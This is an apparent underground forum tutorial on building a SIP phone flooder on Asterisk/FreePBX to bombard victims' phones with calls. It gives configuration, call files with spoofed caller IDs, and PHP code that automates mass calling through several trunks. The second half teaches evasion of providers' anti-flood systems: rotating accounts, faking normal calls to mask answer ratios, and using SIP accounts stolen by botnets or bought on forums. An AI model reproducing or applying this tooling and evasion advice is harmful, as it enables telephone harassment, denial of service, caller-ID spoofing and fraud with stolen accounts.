Asterisk Phone Flooder with Anti-Flood Bypass


Posted December 1, 2017 (edited)


Table of contents

- Introduction
- Installing and configuring Asterisk in 5 minutes with the GUI interface
- SIP Phone Flood
- Bypassing SIP providers' anti-flood protections

Introduction.

Threads about telephone flooding come up on the forum very often. The topic is ancient but still relevant. The software that is publicly available and lets you flood through SIP is so crooked that you sometimes wonder how it still manages to sell, and bypassing anti-flood protection is out of the question with it. I propose to correct this situation. The article is aimed mainly at beginners and at people only slightly familiar with the concept of SIP telephony. Old-timers, please don't kick, but there is interesting info for you at the end of the article on avoiding bans from SIP operators for flooding. I also want to note that the method and code below are fully working and have been tested in combat conditions.

To work we will need:

a) Basic knowledge of Linux.

b) Basic knowledge of any programming language. I will show the example in PHP, although you can implement everything in anything, even a bash script.

c) Steady hands and a little patience.

I do not see the point in describing how the SIP protocol works. For a complete description you need a book, not an article. Besides, I think it makes no sense to write everything from scratch. Fortunately we have at hand a handy tool that has been tried and tested for decades: Asterisk. Asterisk is a VoIP telephony server. It is a stable product often seen in small online stores and even in banks. Any of us has experienced a call to tech support where a nice robot voice asks us to stay on the line. In 99% of cases that IVR menu is running on Asterisk. It has very extensive functionality, but for our flooder 5-10% of the basic functions will be enough.

So first we will need to take a few steps:

a) Install and configure Asterisk.

b) Understand how to make automatic calls with Asterisk.

c) Bypass sip providers’ bans.

Installation and Config.

In fact, Asterisk itself is a well-worn product. Experienced Linux admins can skip this part, because everything will be trivial, but you will have to sweat the small stuff: lots of modules and an even bigger pile of dependencies. Building from source by hand is not a problem for an experienced administrator, but it is a pain for a newbie, and if you are not even familiar with Linux it becomes something out of "Mission Impossible". Many newbies go straight to Google with "centos 6 install asterisk" and get a bunch of supposedly step-by-step articles of the copy-the-commands kind. Usually these articles are old and you will have a lot of problems with dependencies, but even if you succeed at the N-th article there may be an ambush here too. Often the installation in such articles uses not official scripts but third-party ones. For example, at least twice I have seen scripts to install FreePBX which along the way also leave a couple of backdoors. And you often see tips like "disable the firewall", "disable SELinux" and so on. The result of that will be a shell on your box and a drained balance at your VoIP provider. It is only a question of time.

But there is a very simple solution. Fortunately, the Asterisk developers worked hard and made a ready-made ISO for installation. This miracle is called AsteriskNow. The level of complexity is no higher than reinstalling Windows for a classmate. The firewall and fail2ban come configured, so the malicious Chinese brute-forcers will not get through. Also, Asterisk itself implies a rather hardcore configuration: everything is done in configuration files and there are hundreds of them. If you install it for the first time, prepare to spend at least a week digging into the documentation and structure. But there is a solution here too: FreePBX, a GUI admin panel where everything is nice, "on buttons", with graphs and pictures. That is what we need, especially since FreePBX is included by default in the AsteriskNow we are going to install. Here we go:

First of all we will buy a VPS. The only prerequisite is a control panel that allows us to load the AsteriskNow ISO and boot from it. I recommend – https://hostsailor.com/

A VPS with 2GB of RAM or more. After registration and payment (they also accept Bitcoin) we get an e-mail with the login details. We are not interested in SSH; we need the Control Panel. There will be a link to it and a random login and password. Go there.

The next step is to go to the CDRom section at the bottom of the panel, where an ISO can be mounted. The latest AsteriskNow image is already there by default, so select it and click mount.


Next, go to Settings and change the Boot Order to boot from CDRom first.


Reboot the server. Next we connect via VNC and go through a simple GUI OS setup. The same panel has the VNC credentials, but there is also a built-in HTML5 VNC viewer. We use it and go straight to the AsteriskNow installation menu.


Select Full Install. Leave the rest at the defaults (the password you enter during installation will be your SSH root password) and go make coffee. In about 5 minutes everything will be ready. After that, go back to the panel, unmount our ISO, set boot from HDD first and reboot again. Then the modules will be updated, which takes another 5 minutes or so.


Wait in VNC for the installation to complete. After that, just go to the server IP in the browser and you get into the FreePBX admin area. Enter a username, password and recovery email. Skip all the ads and offers and voila, everything is ready. It would be wise to change the Asterisk Manager default passwords straight away. There is also a possible bug with the PHP mbstring dependency (fixed by installing it via VNC or SSH). Once all that is done we land in a nice admin panel with graphs, blackjack and hookers.


So we have installed Asterisk itself; now let's configure it. First we need a SIP provider. In my example I use Zadarma (I just had a couple of dollars left there). Use it only for the first test of the system setup: for flooding they are 100% unsuitable. They have pretty good anti-flood control and you will be banned almost immediately. Allowed only for one-time test calls during development, and only to your own number. You can use your own SIP provider; the settings will not differ significantly. So, first go to Connectivity – Trunks, then add a SIP trunk.

The settings are as follows:

Trunk Name: zadarma

PEER Details:
host=sip.zadarma.com
insecure=invite
type=friend
fromdomain=sip.zadarma.com
disallow=all
allow=alaw&ulaw
dtmfmode=auto
secret=password
defaultuser=111111
fromuser=111111
qualify=400
directmedia=no
nat=force_rport,comedia

USER Context: 111111

USER Details:
host=sip.zadarma.com
insecure=invite
type=friend
fromdomain=sip.zadarma.com
disallow=all
allow=alaw&ulaw
dtmfmode=auto
secret=password
defaultuser=111111
fromuser=111111
qualify=400
directmedia=no
nat=force_rport,comedia

Register String:
111111:password@sip.zadarma.com/111111


Naturally, 111111 is your SIP ID and password is that SIP ID's password; with another SIP provider also change host, fromdomain and the host in the Register String. One caveat: insecure=invite tells chan_sip to accept INVITEs matched to this peer without challenging them for authentication. That is the usual setting for a provider trunk, but it is also one more reason to keep the firewall and fail2ban that AsteriskNow set up, so that the SIP port is reachable only from the provider and from you.

After that go to Reports -> System Status and you should see the active registration of your trunk in the graph (do not forget to Apply Config, because many changes require a reload of the Asterisk core).


Flooding…

It's time to get to the main part of this article. We have a powerful tool in the form of an Asterisk server. Now we need to figure out how outgoing calls are made and how to automate it all. Do you think it's time to dive into the maze of the SIP protocol, INVITEs, redirects and so on? There is no need to rack your brains, because our arsenal has call files. You have probably run into them when receiving a verification call from some boring service, where a robot called you and read out your password or asked you to confirm your identity by pressing 1. Most likely it was done with the help of these magic files.

Call files are plain-text Asterisk files which contain instructions on what trunk to call through, where to call, and which dialplan context should handle the call. To make an automatic outgoing call you just create a file with the extension .call and certain content and drop it into /var/spool/asterisk/outgoing/. Asterisk picks the file up as soon as it appears, so write it somewhere else on the same filesystem first and mv it into place (mv is atomic), otherwise Asterisk can read a half-written file; the file must also be readable by the user Asterisk runs as.

It is really a .txt file with its own structure and the .call extension. You can read the full documentation on it in the Asterisk docs, but let's have a quick look at the basic functionality for a flooder using a standard call file:

Channel: SIP/zadarma/111111111111
Callerid: 222222222222
Context: context
Extension: s
Set: variable=test

In Channel we pass where to call: the channel technology (SIP), then the trunk (we can have many), and at the end the phone number to call (usually in international format without +, but that depends on the provider).

CallerID is the number presented as the caller (the spoofed number). Not all providers support it: Asterisk transmits what you specify here, but the SIP provider itself may overwrite it.

Context is where to hand the call. Call handling is controlled by the Asterisk file extensions.conf, where all macros and actions performed during the call are written. The functionality is enormous. Say you need calls to the U.S. to go strictly through a certain operator: that is specified here. Or you want a certain melody to play when the phone is picked up: again, welcome to extensions.conf. We describe what we need below; a regular flooder needs 1-3 commands at most.

Extension is the entry point within the context from which to start executing actions. In our case do not focus on it and just specify s, the "start" extension, which is the conventional entry point when no particular extension is dialed.

Set: variable=test passes your own variables to the dialplan; here a variable named variable with the value test. It is useful when you need to pass something dynamically, for example how long to wait after the receiver is picked up for a particular number, or which audio to play instead of a plain melody. You will not need it for a usual flooder, but it is irreplaceable for some cool stuff.

We took the structure apart. As you can see, all we're missing is the Context: a macro with instructions for our robot on what to do once the call is made. Open /etc/asterisk/extensions.conf, go to the very bottom (this is important) and write our first macro. Caveat for FreePBX systems: FreePBX regenerates extensions.conf on every Apply Config, so anything added there directly will be overwritten; put custom contexts into /etc/asterisk/extensions_custom.conf, which FreePBX #includes, and they will survive.

[flooder]
exten => s,1,Hangup()

As you can see the structure is as follows:

exten => is the beginning of any instruction.

s is the extension. s stands for "start", the conventional entry point of a context; it is what we specified in the Extension line of the call file. Just specify s.

1 is the priority. Each action has its own priority; the number tells Asterisk where to start, and Asterisk executes the commands in ascending priority order. If that is not clear yet, it will be in the more complex example below.

Hangup() is the application itself; this one simply hangs up.

As you can see, our macro just rings until the call is picked up and, once it is picked up, hangs up (the maximum call duration can be set globally in the admin panel or in the call file). Want something a little more complicated? Easy:

[flooder]
exten => s,1,SendDTMF(1,1000,100)   ; send the digit 1: 1000 ms pause between digits, 100 ms tone duration
exten => s,2,Playback(melody)       ; play the audio file melody from /var/lib/asterisk/sounds; name only, no extension
exten => s,3,Wait(${WAITIME})       ; wait the number of seconds passed from the call file via Set: WAITIME=10
exten => s,4,Hangup()


After each save of extensions.conf you need to reload the dialplan for the changes to take effect. dialplan reload from the Asterisk CLI (asterisk -r) is enough; an amportal restart (fwconsole restart on newer FreePBX) or a reboot of the whole server also works.

To start, I suggest creating a simple macro at the very end of extensions.conf. Now create a test .call file and drop it into /var/spool/asterisk/outgoing/. Don't forget to specify your phone number, CallerID and the new macro (as Context). If everything was done correctly, Asterisk will pick up the call file and make the call right away. An interesting feature: you can schedule a call for later. Just set the modification time of your call file into the future (for example touch -d "..." file.call; remember the server may be in a different time zone) and the call will be placed only when that time arrives. If the call did not go out, you made a mistake somewhere and it is time to learn the debugging tools. Type asterisk -r in SSH to get the Asterisk management CLI, then core set verbose 10 to make the log more detailed. Then place a call through a call file and look for errors. It is unlikely you will hit anything unique, so "may the power of Google be with you".

To summarize, you can quickly sketch a simple script that creates a call file, waits a while and does it again in a loop. The basic functionality of the flooder core is ready. Of course, it would be nice to write an admin panel, insert CallerIDs dynamically for spoofing, send different DTMF when flooding some services, and so on. But those are already details.

Getting banned by the SIP provider.

It's time to move on to the cons of this whole system. Our flooder will work like clockwork, the calls will go out like clockwork, the victims will smash their phones against the wall until... until the SIP provider blocks you. And it is not only about abuse complaints (although it is about them too). First of all, the provider gains nothing from it: it loads their system resources. In addition, SIP providers are often only resellers who buy routes from larger (and not so large) operators. Each route (say, a route for calls to the U.S.) has parameters: ASR (Answer-Seizure Ratio) and ABR (Answer-Bid Ratio). In essence they are the percentage of answered calls out of the total number of attempts. As you understand, you will have a lot of unanswered calls and the parameter will start to sag. The operator comes down on the provider, and the provider comes down on you. It is very unprofitable for the operator, so as a rule he has already come down on his providers more than once over the years. Almost all providers therefore have automatic anti-flood control that tracks the slightest dip in ASR (and other parameters!) and, depending on the provider, either bans you temporarily or flags your SIP account and sends it to manual moderation. In general, you are unlikely to find a provider without anti-flood control. So was everything you did above in vain? Ha, of course not, and today is not April 1st. Let's move on to the main point of the article, which will be of interest to the more experienced comrades.

Ways to bypass antiflood control:

a) Work directly with hardware instead of through SIP providers.

b) Dynamic distribution of calls across different trunks.

a) The option of working directly with hardware will not be considered here in detail. I can note that a GoIP GSM gateway can easily be connected to this system. A GoIP for 4 SIMs will not raise suspicion with the mobile carrier, but of course it is idiocy to put it at your own place. Besides, I hope you plan to flood at scale, which already implies a drop who can be trusted with $100+ of equipment, a steady supply of SIMs, and the fact that mobile carriers also don't like flooding and will ban SIMs periodically.

b) And here it gets more interesting. If you read the article carefully, you realized that each provider can have its own trunk. Moreover, with one provider you can create more than one account and connect each to a different trunk. And in the call files you specify the trunk through which the outgoing call goes, so they can easily be alternated. I also advise you not to drop the call immediately; better wait some random time. It is also worthwhile to emulate a real person by making calls to your own numbers and playing pre-prepared audio. Calls to the U.S., say, often cost a penny, and you can easily carry these costs. In this case the chance of getting banned is quite low. And if you also automate the registration process, the number of such accounts can be bred to an incredible number and the ban rate correspondingly reduced to zero. In addition, botnet owners can simply make a list of the top 100 SIP companies and search for them in their logs. Believe me, you will be surprised. And if you don't have a botnet, on many forums you can buy the accounts you need for shekels from botnet owners. Often they are not in demand.

To summarize the basic rules:

a) Distribute the flooding to different sip providers.

b) Simulate real calls in parallel.

c) Don't sink the ASR too much: do not drop the call immediately.

The main problem will be the interleaving of calls. Some will be dropped, some may stay active if the victim deliberately picks up hoping to burn through all your funds. A simple sleep() in the script and such primitive interleaving will quickly get you banned. You have to dynamically track the running calls per thread and start them by timer and pre-defined rules. Here I will help you with a ready-made class and a small piece of code for dynamically parallelizing flood processes.

So: Asterisk has an interesting feature called the Asterisk Manager Interface (AMI). It is not the CLI we used when debugging the call files (asterisk -r), but a text protocol on TCP port 5038 through which you can run actions against the Asterisk core, including CLI commands via Action: Command. By default on FreePBX it listens on 127.0.0.1:5038 with the username:password admin:amp111 (unless you changed it during installation). Keep it bound to localhost and change that default secret; anyone who reaches AMI with it can originate calls and run any CLI command. Anyway, here is a simple class for this functionality:

Asterisk Manager class

<?php
// Minimal AMI client. The class header was lost in extraction and is reconstructed
// from the usage below (new AstMan(), $this->socket, $this->error).
class AstMan {
    var $socket;
    var $error;

    function __construct(){
        $this->socket = FALSE;
        $this->error = "";
    }

    function Login($host="localhost", $username="admin", $password="amp111"){
        $this->socket = @fsockopen($host, 5038, $errno, $errstr, 1);
        if (!$this->socket) {
            $this->error = "Could not connect - $errstr ($errno)";
            return FALSE;
        }
        stream_set_timeout($this->socket, 1);

        $wrets = $this->Query("Action: Login\r\nUserName: $username\r\nSecret: $password\r\nEvents: off\r\n\r\n");

        if (strpos($wrets, "Message: Authentication accepted") !== FALSE){
            return TRUE;
        }
        $this->error = "Could not login - Authentication failed";
        fclose($this->socket);
        $this->socket = FALSE;
        return FALSE;
    }

    function Logout(){
        if ($this->socket){
            fputs($this->socket, "Action: Logoff\r\n\r\n");
            $wrets = "";
            while (!feof($this->socket)) {
                $wrets .= fread($this->socket, 8192);
            }
            fclose($this->socket);
            $this->socket = FALSE;
        }
    }

    // Send one complete AMI action (it must end with an empty line) and read the
    // response up to the terminating empty line, EOF, or the 1 s socket timeout.
    function Query($query){
        $wrets = "";
        if ($this->socket === FALSE)
            return FALSE;

        fputs($this->socket, $query);
        do {
            $line = fgets($this->socket, 4096);
            $wrets .= $line;
            $info = stream_get_meta_data($this->socket);
        } while ($line !== FALSE && $line != "\r\n" && $info['timed_out'] == false);
        return $wrets;
    }

    function GetError(){
        return $this->error;
    }

    function GetDB($family, $key){
        $value = "";
        $wrets = $this->Query("Action: Command\r\nCommand: database get $family $key\r\n\r\n");
        if ($wrets){
            $pos = strpos($wrets, "Value: ");
            if ($pos !== FALSE){
                $value_start = $pos + 7;
                $value_stop = strpos($wrets, "\n", $value_start);
                if ($value_stop === FALSE) $value_stop = strlen($wrets);
                $value = trim(substr($wrets, $value_start, $value_stop - $value_start));
            }
        }
        return $value;
    }

    function PutDB($family, $key, $value){
        $wrets = $this->Query("Action: Command\r\nCommand: database put $family $key $value\r\n\r\n");
        if (strpos($wrets, "Updated database successfully") !== FALSE){
            return TRUE;
        }
        $this->error = "Could not update database";
        return FALSE;
    }

    function DelDB($family, $key){
        $wrets = $this->Query("Action: Command\r\nCommand: database del $family $key\r\n\r\n");
        if (strpos($wrets, "Database entry removed.") !== FALSE){
            return TRUE;
        }
        $this->error = "Database entry does not exist";
        return FALSE;
    }

    function GetFamilyDB($family){
        $value = array();
        $wrets = $this->Query("Action: Command\r\nCommand: database show $family\r\n\r\n");
        if ($wrets){
            // Asterisk 13 wraps CLI output in "Response: Follows ... --END COMMAND--";
            // Asterisk 14+ returns it as "Output:" headers instead and needs a different parser.
            $start = strpos($wrets, "Response: Follows\r\n");
            $stop  = strpos($wrets, "--END COMMAND--");
            if ($start !== FALSE && $stop !== FALSE){
                $wrets = substr($wrets, $start + 19, $stop - ($start + 19));
            }
            foreach (explode("\n", $wrets) as $line){
                $line = trim($line);
                // database show prints one "/family/key : value" per line
                if ($line === "" || $line[0] !== "/" || strpos($line, ":") === FALSE) continue;
                list($k, $v) = explode(":", $line, 2);
                $k = trim($k);
                $prefix = "/$family/";
                if (strncmp($k, $prefix, strlen($prefix)) === 0) $k = substr($k, strlen($prefix));
                $value[$k] = trim($v);
            }
            return $value;
        }
        return FALSE;
    }
}
?>

I'm not going to analyze everything line by line. If you need details, the Asterisk Manager documentation, its database, etc. are all on Google. Here is a small example of using my class, with a description. Note that each action (the Action header and the Command header) goes in a single Query() call: Query() waits for the empty line that terminates the response, so splitting an action across two calls only works by running into the socket timeout.

$ami = new AstMan();                                                     // create an object
$a = $ami->Login();                                                      // log in; host, login and password default to the values in Login()
$c = $ami->Query("Action: Command\r\nCommand: sip reload\r\n\r\n");      // sip reload reloads the chan_sip module
$d = $ami->Query("Action: Command\r\nCommand: dialplan reload\r\n\r\n"); // reloads the dialplan from extensions.conf
$e = $ami->Query("Action: Command\r\nCommand: sip show peers\r\n\r\n");  // lists the SIP peers
$f = $ami->Logout();

The results are returned in the variables. You can print them with echo; it is the same output you would get typing these commands in the CLI menu, asterisk -r.

You understand the principle of the class. Now let's work out how many calls are hanging on which trunk and, accordingly, get the ability to parallelize them.

Example code for paralleling calls by trunks


function get_calls($ami){
    $c = $ami->Query("Action: Command\r\nCommand: core show channels\r\n\r\n");
    $parse = explode(PHP_EOL, $c);
    foreach ($parse as $a_calls){
        // the summary line reads "N active channel(s)"
        if (strpos($a_calls, 'active channel')){
            $calls = explode(' ', $a_calls);
            $active_calls = $calls[0];
            return $active_calls;
        }
    }
}

function getTrunk($ami){
    $trunk_array = parse_ini_file("trunk.ini");   // trunkname = max_active_calls
    $c = $ami->Query("Action: Command\r\nCommand: core show channels\r\n\r\n");
    echo "Total number of active calls:\n";
    foreach ($trunk_array as $k=>$i) {
        $count = substr_count($c, $k);            // channels whose name contains the trunk name
        echo "$k = $count\n";
    }
    ob_flush();
    foreach ($trunk_array as $k=>$i) {
        $count = substr_count($c, $k);
        if($count < $i){
            echo "Found trunk $k... Starting...\n";
            ob_flush();
            return $k;
        }
    }
    return '';
}

$ami = new AstMan();
$a = $ami->Login();
// $proceed, $id, $phone, $name, $clid, $context and $i come from the caller's own
// call list / database and are not defined in this excerpt.
while($proceed){
    $trunk = '';
    echo "\n\nID: $id Call $phone.....\n";
    while(!$trunk){
        ob_flush();
        $trunk = getTrunk($ami);
        if(!$trunk){
            echo "All trunks are busy... Wait 5 seconds\n";
            ob_flush();
            sleep(5);
        }
    }
    ob_flush();
    $call_file = "Channel: SIP/$trunk/$phone" . PHP_EOL .
                 "Callerid: $clid" . PHP_EOL .
                 "Context: $context" . PHP_EOL .
                 "Extension: s" . PHP_EOL;
    file_put_contents("/var/spool/asterisk/outgoing/potok$i.call", $call_file);
    echo "ID: $id >>>> The call to $name at $phone has been queued\n";
}
$ami->Logout();
ob_end_flush();

This is just an example of the functionality for determining the number of threads. The configuration lives in the trunk.ini file, where we set how many active calls to run for each trunk. When the limit is reached, the script sits in sleep(5) and refreshes the information through Asterisk Manager until a slot frees up. This is a clipping from a working flooder, plus I deliberately left a couple of fool-proofing errors in it, but I think you will understand the basic principle.

I would recommend adding the following:

1) Work with a database.

2) Rules and call statistics for each trunk.

3) Imitation of calls to your own numbers when the ASR of some trunk drops. Read the ASR yourself and store it in the database.

In total, with this scheme SIP flooding will work 100% stably with a minimum number of bans. If you do not sink the ASR too much and dilute the logs with different numbers, the SIP providers will not complain. Also, each provider needs its own rules; that comes only with experience. I advise against taking Russian (ruble) companies: they are loaded to the brim and have strict restrictions. Small DE and NL providers do fine. If you intend to build this as a service rather than for personal use, I advise approaching the SIP operators directly (not the providers). You will have to make a deposit of $100-500 and use it up once a month, but the restrictions will not be as rigid. And I advise looking for accounts in logs; it is often much easier and more profitable than registering everything yourself, plus there is usually a good balance, and if the accounts are used properly they will live long.